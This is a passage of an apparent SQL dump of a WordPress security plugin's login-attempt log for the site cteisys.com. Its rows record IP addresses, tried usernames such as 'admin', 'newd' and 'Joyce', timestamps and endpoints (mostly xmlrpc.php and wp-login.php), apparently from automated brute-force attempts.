0,0,0),('192.163.195.60',3231957820,'admin',0,1665034340.0363,152,'abvgGterUcsXZFO6CKWHYVEw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.245.38.42',2650089002,'admin',0,1665034619.0832,152,'WHZVsX2Yzdtcgu8QivAMhanm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.214.194',2487801538,'admin',0,1665034874.3430,51,'ij90ZzrEFRO41PUDekcsWoyx','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.89.164.128',2673452160,'admin',0,1665034911.4197,51,'Yj4PToxfBk1azpedv3HigMJr','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.195.237.203',3116625355,'joyce',0,1665034948.1630,152,'QIdGCusmngLM1lkOv3Hji6rh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.99.54.31',2808296991,'admin',0,1665034949.2771,152,'1BfSI4ueWoi3LHFa9yTKd7rm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('155.133.142.66',2609221186,'admin',0,1665035631.2769,152,'TlC45WRJdwoc9Zz0DkSMAjGm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('31.184.242.14',532214286,'admin',0,1665035967.5561,152,'O6vDVmxZweiIJ25EBo4QUdTr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.99.34.140',3227722380,'admin',0,1665036317.7367,152,'VS1ofLbqFTgcpn5u7MJC0rzt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('199.249.230.42',3355043370,'Joyce',0,1665036416.1801,152,'ePH8lszG0AdRWn2Zct71jaLq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('131.153.50.250',2207855354,'admin',0,1665037013.3563,152,'ck79iNQ2VUPdoafTyGpuBl6x','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('54.37.254.14',908459534,'newd',0,1665037283.7826,7,'WvxGC9N1PTZJO4scafbhnd2o','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('111.90.150.171',1868207787,'admin',0,1665037396.9832,152,'2wxG1WjYE0FInqV3HCZKehM7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('161.35.193.62',2703475006,'admin',0,1665037765.8038,152,'DpjcmWk8RlqT4fKwHG1IdQzu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.200.117.131',3116922243,'Joyce',0,1665038549.4621,152,'RENLHdGDYiAFTvSx5MBPIsOJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.91.83.187',861623227,'admin',0,1665038919.6787,152,'JbufEBOvSAkcKyq02pm5x7ld','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.245.166.98',2650121826,'admin',0,1665039287.6298,152,'0PyTA8qVMezQxwKjIbG92cHl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.207.163',2487799715,'newd',0,1665039688.2752,7,'k9Si6H51wmDoVRK4xlrtPec7','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('147.135.255.8',2475163400,'newd',0,1665039723.7119,7,'e6VhBfkJp0Cc2Y7XFIKimar1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('97.79.239.127',1632628607,'admin',0,1665040075.6501,152,'S1u6t93UMaKslBo7ZPGxcbLh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.55.255.20',3476553492,'admin',0,1665040495.1757,152,'n6gUoARPMms8W5ap0ZuiJCqD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('90.156.169.12',1520216332,'admin',0,1665041318.3788,152,'SFZrOztkuP0KIB9g6aLsVDCv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('64.227.39.41',1088628521,'newd',0,1665042103.1110,7,'j9QVRxedCvOhcwfyL2IB7bpm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('137.184.140.67',2310573123,'admin',0,1665042111.5785,152,'vjOyKwoCgpBn85EZrAfT2X4c','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('206.189.60.87',3468508247,'newd',0,1665042130.3525,7,'rUJZGY67ma5Qs8BvwzMlf14b','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('128.199.205.115',2160577907,'admin',0,1665042531.9649,152,'jEVNnC86P0YQ3hSFWMbU5Bvs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.65.58.34',2671852066,'admin',0,1665042961.6149,152,'Dzef5GrCObWqkSxp04Xc2L7i','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.221.106',2994789738,'admin',0,1665043796.9086,152,'pfJhoK1PwQIgtCN6qGm2RbSX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.101.156.219',90545371,'admin',0,1665044252.3514,152,'XhyeDFa0QudMUYT47iNn9IVb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.64.82.118',3225440886,'newd',0,1665044560.3809,7,'nqoRS8HXhr56ufzWet3EsFiQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('164.92.66.133',2757509765,'admin',0,1665044650.8903,152,'Js8tvBcMZAjS5KwXz943nuOh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('101.99.95.162',1701011362,'admin',0,1665045122.7898,152,'JvCy0b7GLWlnkHmPz6qS1e8o','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('151.80.20.26',2538607642,'admin',0,1665046010.6199,152,'q3ABuQCaDbIfTnltSN9JMrpm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.233.89.214',3270072790,'admin',0,1665046452.6524,152,'BlxFm2otSPUKaD4NIwrTc3v5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('43.225.53.24',736179480,'admin',0,1665046899.3819,152,'GvrSlWCkENQgM3fLoZ9ndKUh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.203.156',2388511644,'newd',0,1665046908.2130,7,'pP3O84wuoBxYSdeglKNtRT0J','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.166.183.39',3165042471,'newd',0,1665046952.4354,7,'tsLh5IcnS1mfpOoYd6e8DyH3','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('82.165.184.76',1386592332,'admin',0,1665047342.4200,152,'HYmRv245LP7iEwJe83VNFnpg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.99.54.31',2808296991,'newd',0,1665047801.7376,152,'tCWh8xEB7wyb2apcH6S1urvf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.65.149.229',2671875557,'newd',0,1665048266.2356,152,'z645AwhyMab1fg3TeVQ9DWXd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.90.150.28',1868207644,'newd',0,1665048731.3241,152,'4aSDwtq0dGRPF1r7yQNYh8TA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.19.179.171',2249438123,'Joyce',0,1665048744.6105,152,'8p5Rf6DYAmohVnCTExkiMS3K','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.184.74',1386592330,'newd',0,1665049326.5655,7,'aQFu8Rme3p4YDzo6bwPlydjx','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('77.240.13.186',1307577786,'newd',0,1665049369.4240,7,'zvKdyGU8Qeh63Abq79lgCD0f','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.233.66.131',3270066819,'newd',0,1665049640.1226,152,'7NdhGqZB65px319isAXYnVuS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('216.158.230.167',3634292391,'newd',0,1665050132.7253,152,'ig8l7O4ynk1NrhAous03CQdI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('146.70.61.131',2454076803,'joyce',0,1665050383.3688,152,'hxCSUntTrD57bWzg4YoFXQZs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.171.170.94',3198921310,'newd',0,1665050564.4680,152,'E5Gv6HWfq7y9xDrOV4TpiBnz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('16.162.114.74',279081546,'newd',0,1665051522.3551,152,'gJj3KrywoN0tz14EW7dfLSR5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.69.109.132',574975364,'newd',0,1665051753.1817,7,'Yyz0ia5A6drxKR1Gjgwo3NPW','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('147.182.249.22',2478242070,'newd',0,1665051780.8817,7,'GSvcZbkrfCAaoOLq9j0QzP6E','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('35.198.25.12',600185100,'newd',0,1665052005.9732,152,'qeNpHYRITzsvXaU64hEQwDcM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.233.192.83',1844035667,'newd',0,1665053011.7540,152,'cOEDwLrtbk0KG6vnfo3RBMJU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.74.118.242',1732933362,'newd',0,1665053479.7957,152,'VKIfyhziuY8c39bLtNovGPXa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.219.251.247',1759247351,'newd',0,1665053983.0273,152,'Nhf6A2CHDsu1Fl0BkyQvP79S','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.56.13',3515693069,'newd',0,1665054017.2208,7,'MtHaifOT7SbYrRKqJ5hyjpCE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('80.88.88.149',1347967125,'newd',0,1665054187.2508,7,'bxftGmyzqJ6WvnrN0A1CMBPV','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.55.206',3515693006,'newd',0,1665054317.1971,7,'VQtmeSOMGf9KJBLa8ocWYwpy','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.99.54.31',2808296991,'newd',0,1665054986.1066,152,'9LMXYgpRu7oWIJbnzOm3TEAB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('151.106.35.235',2540315627,'newd',0,1665055503.4782,152,'32AWwnEOiQKjseHNVCBt1qJI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.19.179.171',2249438123,'Joyce',0,1665055669.9514,152,'XYTve3O507iypWlaNMzmot6I','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.212.34.36',3168018980,'newd',0,1665056010.9947,152,'BTtDcafse75CFSvkJruAKpog','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.28.218.235',2333924075,'Joyce',0,1665056575.8643,152,'LMOt6RZoxf7vjCN3YgXKlUFb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('77.240.13.186',1307577786,'newd',0,1665056666.2563,7,'yMBG5O8PgUoZabESzL6RqXQH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('75.119.157.181',1266130357,'newd',0,1665056713.4663,7,'Uve375A4s1iDoymVSPl8Z6ah','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('187.32.188.214',3139484886,'newd',0,1665057007.8282,152,'5dsHzcWxTrPhUK3tJmnk1LGy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('199.249.230.7',3355043335,'Joyce',0,1665057080.9348,152,'hnDfX7exU30IBkNZpgrlCmQG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('199.249.230.7',3355043335,'joyce',0,1665057230.5913,152,'EobX1Kujf2TemzvLCcGRrh6n','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('193.176.230.188',3249596092,'newd',0,1665058066.3808,152,'KLSH5Axqy7dGh4Dbmlw81riN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.75.221.171',3091979691,'Joyce',0,1665058904.5509,152,'hTGqPkxR5NsZlAt9CBJSc6QE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('195.225.76.130',3286322306,'wadminw',0,1665059389.6545,51,'2OlAuWbVqpeLX5PSH179zgxT','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('95.167.178.158',1604825758,'wwwadmin',0,1665060441.7107,51,'6CudpwUnktR2yVLK5BP4ZaFl','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('137.184.117.52',2310567220,'newd',0,1665060595.8997,7,'9JzdsUeEAxZWTyjOhbtkgISq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.71.141.164',2806484388,'newd',0,1665060633.5077,7,'hQ3pRG5egZmtcAaF0InsEJLH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('14.29.247.201',236845001,'newd',0,1665060697.1731,152,'0RowkAOpeD1rsZf49jBIaldN','','0|0|0|0|www.cteisys.com/xmlrpc.php',0,0,0),('14.29.247.201',236845001,'newd',0,1665060698.3293,152,'MpQwzbyd6uBnSGIcfrvgDm5x','','0|0|0|0|www.cteisys.com/xmlrpc.php',0,0,0),('14.29.247.201',236845001,'newd',0,1665060699.4566,152,'8G4ayRPlnWVc3BtrO2oELizk','','0|0|0|0|www.cteisys.com/xmlrpc.php',0,0,0),('14.29.247.201',236845001,'newd',0,1665060700.8291,152,'dk1lYgoBjAq27wJTZcNPQ0XO','','0|0|0|0|www.cteisys.com/xmlrpc.php',0,0,0),('14.29.247.201',236845001,'newd',0,1665060702.0044,152,'il3DOgemKEHvIMo4ztSd5bFT','','0|0|0|0|www.cteisys.com/xmlrpc.php',0,0,0),('14.29.247.201',236845001,'',0,1665060702.0091,10,'il3DOgemKEHvIMo4ztSd5bFT','','701|0|0|0|www.cteisys.com/xmlrpc.php',0,701,0),('14.29.247.201',236845001,'',0,1665060702.9145,71,'mD2vIlneXuASiQac7dgfGNLF','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.29.247.201',236845001,'',0,1665060704.0736,71,'4z0ALd7KtVrT2qxRY8FfhWlo','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.29.247.201',236845001,'',0,1665060705.0779,71,'ZkQKEdg6IsB4tLor5e9qnhYN','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.29.247.201',236845001,'',0,1665060706.0725,71,'gkpt1aWNmEcyVTdRDBHJ2o7q','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.29.247.201',236845001,'',0,1665060707.1193,71,'vuG1NQwVYecDRgs5yIJ976mj','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.29.247.201',236845001,'',0,1665060708.3119,71,'uagm3URCBQ0wZ65hV4zLXWfH','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.29.247.201',236845001,'',0,1665060709.5147,71,'EC5INxKXdBWALio769qsarZz','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.29.247.201',236845001,'',0,1665060710.8081,71,'EymM0xB9Y8FRO6kqDTit7Spl','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.29.247.201',236845001,'',0,1665060712.0848,71,'XVikSDAcnN8zrYuwIPRoOmUq','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.29.247.201',236845001,'',0,1665060713.3293,71,'LpzQMYuO9cTKhNUxvetfCEXj','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.29.247.201',236845001,'',0,1665060714.4756,71,'7GASxpgUWahBVPvtdDT1uyJN','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.29.247.201',236845001,'',0,1665060714.4761,18,'7GASxpgUWahBVPvtdDT1uyJN','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('95.173.161.171',1605214635,'admin',0,1665061340.2709,152,'JiIoQqL2APKUdrjVWHFhEnkg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.109.135',2160553351,'admin',0,1665061874.3139,152,'iA4ZjCJnfwg9byY6x3dzXDQM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.64.113.147',3225448851,'newd',0,1665062450.5692,152,'SoEOaMnVCB2WeK7r6pH3JdhL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.188.157.79',3485244751,'newd',0,1665063113.3158,7,'wRnr2EKahV3M0GFgL6ybxSP1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('95.217.179.54',1608102710,'newd',0,1665063141.0141,7,'kMt2xDPKTUQbymf8dGeA1LI9','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('173.212.197.26',2916402458,'newd',0,1665063574.1434,152,'HyeLbs3NhRmgMKuwtW2YvjUa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.111.30.40',1735335464,'newd',0,1665064102.8269,152,'HonSLUMFN8VtaTEu1pjZPIsg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('14.29.247.201',236845001,'newd',0,1665064335.0249,152,'9kmEUSOZIGJiRs15YvAMjr3e','','0|0|0|0|www.cteisys.com/xmlrpc.php',0,0,0),('14.29.247.201',236845001,'newd',0,1665064335.1870,152,'7utXebdqzGEPhQULr0k18AFc','','0|0|0|0|www.cteisys.com/xmlrpc.php',0,0,0),('14.29.247.201',236845001,'newd',0,1665064335.3981,152,'w7XVoxemjLqB4lhIfSukTvag','','0|0|0|0|www.cteisys.com/xmlrpc.php',0,0,0),('14.29.247.201',236845001,'newd',0,1665064335.9836,152,'OBePpWoVluNq8IZvbj6G1FJ7','','0|0|0|0|www.cteisys.com/xmlrpc.php',0,0,0),('14.29.247.201',236845001,'newd',0,1665064337.1386,152,'LrWMBP8ehy6Gzo9dwA7qH43K','','0|0|0|0|www.cteisys.com/xmlrpc.php',0,0,0),('14.29.247.201',236845001,'',0,1665064337.1995,10,'LrWMBP8ehy6Gzo9dwA7qH43K','','701|0|0|0|www.cteisys.com/xmlrpc.php',0,701,0),('14.29.247.201',236845001,'',0,1665064339.9283,71,'Tbx6vaStkBmALnPs7W8flGQ1','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.29.247.201',236845001,'',0,1665064341.1638,71,'JrRYls5tfNPozyvMBnTx47Vj','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.29.247.201',236845001,'',0,1665064342.2339,71,'6FYNQMDxmPn9ztidTKEXa23h','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.29.247.201',236845001,'',0,1665064343.3096,71,'QgCr73zZGxOLJ6c5iVEU0bHv','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.29.247.201',236845001,'',0,1665064344.4631,71,'SKs7jwTXNFWBo05ryIfk4qEC','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.29.247.201',236845001,'',0,1665064345.7277,71,'Uwd9q3ISrcp5AHOJoylL0Vfz','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.29.247.201',236845001,'',0,1665064347.0438,71,'rhDJZUvpXqFCdoLb3mwenIAW','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.29.247.201',236845001,'',0,1665064348.2667,71,'JcgFyMOlwsoVdx8T0q3GZBP7','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.29.247.201',236845001,'',0,1665064349.5445,71,'t4Q17rCiTUSbJc2nLDqvFHIp','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.29.247.201',236845001,'',0,1665064350.7579,71,'Fi2LRZUzVNra6S75PhADEnXu','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.29.247.201',236845001,'',0,1665064351.9114,71,'T2p9CBsyxudW6D5aQ1l08jvH','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.29.247.201',236845001,'',0,1665064351.9118,18,'T2p9CBsyxudW6D5aQ1l08jvH','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('5.101.157.25',90545433,'newd',0,1665064723.9194,152,'Y69H3oBaGsLT2djcfpwOtAMb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.96.74.105',794839657,'newd',0,1665065617.4281,7,'XKITJ0x9HSiDcYwnN7vMjpym','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('148.72.214.245',2487801589,'newd',0,1665065662.4643,7,'IELs3w8qjNaMVg0eXTUQnZ9x','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.241.174.216',2733747928,'newd',0,1665065859.9657,152,'yb7KI4ja0utM38dpxJ5QUvgW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('74.208.103.228',1255172068,'newd',0,1665067019.3893,152,'EeUd2NTOD47GM8KyYtqhS1LR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('86.105.9.67',1449724227,'joyce',0,1665067363.9585,152,'8xWn0tphar716GumHoOLe4Dl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.107.177.243',3194728947,'newd',0,1665067585.0965,152,'bjv0YUAk4tOew5dnhGExLZqz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('151.106.41.64',2540316992,'newd',0,1665068160.8106,7,'flZUHedxQ3iow86OhmMGc4X7','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.178.138.5',867338757,'newd',0,1665068192.4726,7,'89dUkBfCzy2uSK4VJtQ7FMb5','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('80.77.135.125',1347258237,'newd',0,1665068201.9802,152,'dTIzOicL6ZwNKW40lgMJBVRU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.173.161.171',1605214635,'newd',0,1665068794.8321,152,'wL1CdMZUVWgDuz5olbQJ6cKa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.109.135',2160553351,'newd',0,1665069377.0364,152,'b824cdVpCFzGqLPW1hKRXove','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.117.30',2335929630,'newd',0,1665070544.3024,152,'ZcXV3U20JlHfCrKLzeAjYPW1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.132.0.90',864288858,'newd',0,1665070687.0734,152,'iXnLskNZFEAQHbh8geBf7CIu','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('51.132.0.90',864288858,'newd',0,1665070688.5316,152,'OBgKoaMsRGLIkupjWTHUwnYt','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('51.132.0.90',864288858,'newd',0,1665070689.8714,152,'t4JaISZsg3NwQ2MKCVf5PeYD','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('104.41.221.5',1747574021,'newd',0,1665070703.8566,7,'1Pp0AySIRnOKqVZdGsJecaTx','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('69.163.186.158',1168358046,'newd',0,1665070751.6910,7,'2wCxVdakZLTmWl8c6jEbRrPu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.116.16.173',1735659693,'newd',0,1665071127.4154,152,'E5Lg8mzvt7jnwFpeIbiO6yl2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.106.201.134',795527558,'newd',0,1665071732.2280,152,'zAcg9DRY1m8UqrLVi23M5xpa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.64.113.147',3225448851,'newd',0,1665072343.0703,152,'R8SA6Od3ZvHWwysu4DqipTmJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('93.114.185.76',1567799628,'newd',0,1665073292.0010,7,'BRpTeu2Jo7rv4zSEDckPHjxl','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.230.127.126',2649128830,'newd',0,1665073323.9424,7,'1MspOG9X3LbdRruUwPiJleBC','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.233.66.131',3270066819,'wadminw',0,1665073551.1685,51,'E4pCgYcHPLVBfJKstk8e0TyF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.91.83.187',861623227,'wwwadmin',0,1665074710.7981,51,'LBTAwPseJ5quoU3Ela26Yn1R','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.219',3583549915,'Joyce',0,1665075240.9827,152,'IPQgmR62ZaeBjyw7tx5rTOzX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.174.248.107',3652122731,'admin',0,1665075749.4099,152,'JEPyRYxv47brCMh0lSmjpIHX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.184.74',1386592330,'newd',0,1665075847.1749,7,'15zl3nKvIS794VGRechokZJP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('192.64.82.118',3225440886,'newd',0,1665075892.3772,7,'Xawf23805mKSgi7nBN9TxUPe','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.187.230',3583556582,'joyce',0,1665076076.7164,152,'5Tl7FXr1YwIHNx3SAM0EJvyK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('152.89.160.131',2556010627,'joyce',0,1665077041.4715,152,'qzhRZLPE3weK9sdYlSTtaJio','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.55.206',3515693006,'newd',0,1665077380.1558,7,'TZpml9ugCqLMj7Pd3ryUo2Gn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.20',3583549716,'joyce',0,1665077556.7647,152,'AaJbQ9KmyrlLRszYdW2Eutqp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('75.119.157.181',1266130357,'newd',0,1665078423.0754,7,'EM9Rw06dFykfNgxXJsriCm4U','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('207.154.250.8',3483040264,'newd',0,1665078452.0967,7,'vsiaIZ57WSFy4dq2xmco9G8r','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.162.149',3583550101,'joyce',0,1665079951.1090,152,'Jd3hnF49gKuyC28abWQNoYBi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.162.149',3583550101,'joyce',0,1665079951.1093,152,'QbH2s0TFU8yXhkZAdRvwJPCD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.61.188.225',759020769,'newd',0,1665080163.4552,7,'iUMCasJbgjDldrAREvx6BNVn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.255.81.60',872370492,'newd',0,1665080954.6124,7,'6g7Ue2rqsCFbiXAJIGjhN1n0','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('166.0.235.97',2785078113,'newd',0,1665080997.5573,7,'1lY3JvQ7ErPfdyi5mjcRa8Zb','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('107.167.244.83',1806169171,'joyce',0,1665081743.9123,152,'6xzmK1HMiPLWu80ZVgICfncU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.25',3583549721,'joyce',0,1665082116.4828,152,'qlegXwnATU9PjJtW8GFHQ2pC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.120.27',3165026331,'newd',0,1665083515.1486,7,'wuAoGn3cXmW8DChZJbUy09Tf','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('91.214.169.69',1540794693,'Joyce',0,1665084064.1262,152,'E8kURxGuA4tohrPsSngN3ja2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.186.35',3583556131,'Joyce',0,1665084839.4054,152,'Ss5yaizke8HuBI7DVqQ9AOvG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.33.193.231',1109508583,'newd',0,1665085886.1945,7,'ikjF0oQdSCwqHzVLfKl3xm7y','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('147.135.255.8',2475163400,'newd',0,1665085923.3336,7,'ZCu70m3yk59FvDbpJBArUqcL','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.40',3583549736,'Joyce',0,1665086075.8617,152,'TgA7juZOFf4DQpqar1R52dmc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.102.148.187',1046910139,'Joyce',0,1665088968.4304,152,'xXCbIem8qKB7dY1FnJ4T5S2E','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.61.188.225',759020769,'newd',0,1665089982.6191,7,'Zimd9zwTy3NJE4MWAe0QLFqH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('149.56.226.67',2503533123,'',0,1665090628.3156,55,'emXkGVYTWRiD8UOIjPrxncb5','','19|0|0|0|mail.cteisys.com/owa/auth/logon.aspx',0,19,0),('149.56.226.67',2503533123,'',0,1665090629.9674,55,'Q6Ik7fX8LmzKcqOwFABGMRNb','','19|0|0|0|cteisys.com/owa/auth/logon.aspx',0,19,0),('149.56.226.67',2503533123,'',0,1665090630.6524,55,'AeRcfBjNC1li5hdOUQDmvZkt','','19|0|0|0|cteisys.com/owa/auth/logon.aspx',0,19,0),('202.29.236.140',3390958732,'newd',0,1665090692.9151,7,'onKEBeJzqVN2HxD801FfXtQW','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.212.34.69',3168019013,'newd',0,1665090737.1198,7,'BJsx2pXqVAcC3QiSFyGgK5DP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('104.254.90.195',1761499843,'joyce',0,1665091342.4497,152,'G4tVbQslcjniu5kforwCYSRP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.46.253',3515690749,'newd',0,1665091810.3706,7,'FVBKzPEglSLpcM6HNs0I5ywm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.189.112.11',3116199947,'joyce',0,1665092664.8545,152,'5Q6ncHC40M2b9A3RKpWqPYry','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.68.76.32',574901280,'newd',0,1665093102.5081,7,'5yumvQsXr7Y8Hkge0BPDWCF